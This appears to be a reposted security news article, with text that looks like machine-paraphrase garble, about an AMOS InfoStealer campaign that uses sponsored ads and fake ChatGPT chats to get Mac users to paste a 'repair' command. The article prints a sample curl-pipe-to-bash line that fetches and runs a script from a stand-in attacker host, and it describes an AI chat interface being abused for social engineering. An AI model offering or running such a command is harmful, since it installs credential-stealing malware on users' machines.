Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

Posted on By CWS

A brand new AMOS InfoStealer marketing campaign is abusing belief in ChatGPT to contaminate Mac units underneath the guise of straightforward troubleshooting assist.

Victims seek for a repair to a sound downside, click on a sponsored ChatGPT consequence, and are proven what seems like a traditional chat session.

The chat then returns a “restore” command and tells the consumer to run it within the macOS terminal.

Google Chrome Looking Historical past extract from contaminated Mac gadget (Supply – KROLL)Google Chrome Looking Historical past extract from contaminated Mac gadget (Supply – KROLL)

The assault blends social engineering and technical abuse in a method that feels routine to customers. There isn’t a faux installer window or apparent phishing web page.

As an alternative, the sufferer follows what seems to be a traditional assist stream in a widely known AI chat interface. KROLL safety researchers recognized that this stream was used to deploy AMOS InfoStealer on focused Mac endpoints.

The KROLL crew detected that the lure is pushed utilizing Google Advertisements, which place the malicious ChatGPT session on the high of search outcomes. The area proven is reputable, which makes it even tougher for a standard consumer to identify the danger.

As soon as the consumer trusts the chat, a single copy‑paste operation within the terminal is adequate to compromise the system.

ChatGPT Directions proven to the consumer (Supply – KROLL)

The affect is critical for each house customers and corporations. AMOS InfoStealer is constructed to reap browser information, credentials, session cookies, and different saved secrets and techniques from the contaminated Mac.

Stolen information can then be reused for account takeover, lateral motion, or sale on underground markets.

An infection Mechanism and Malicious Command Execution

KROLL analysts traced the preliminary an infection to a terminal command given by the faux ChatGPT chat, which acts as an indicator of compromise.

The command tells macOS to obtain and run a distant script, a sample that aligns with MITRE ATT&CK strategies for consumer execution and ingress device switch.

A typical malicious sample seems like:-

curl -s https://attacker-example[.]com/installer.sh | bash

When executed, this one‑line command pulls a shell script over HTTPS, saves nothing seen to the consumer, and runs the script in the identical terminal session. The script can then set up AMOS, arrange persistence, and begin information theft.

Comply with us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:, , , , , , , ,

Related Posts

Threat Actor Mimo Attacking Magento CMS to Steal Card Details and Bandwidth Monetization Cyber Security News
Infamous Cybercriminal Forum BreachForums Is Back Again With A New Clear Net Domain Cyber Security News
New ClickFix Attack Mimic as AnyDesk Leverages Windows Search to Drop MetaStealer Cyber Security News
GhostContainer Malware Hacking Exchange Servers in the Wild Using N-day Vulnerability Cyber Security News
12 Best OSINT Tools for Penetration Testing Cyber Security News
Akira and Lynx Ransomware Attacking Managed Service Providers With Stolen Login Credential and Vulnerabilities Cyber Security News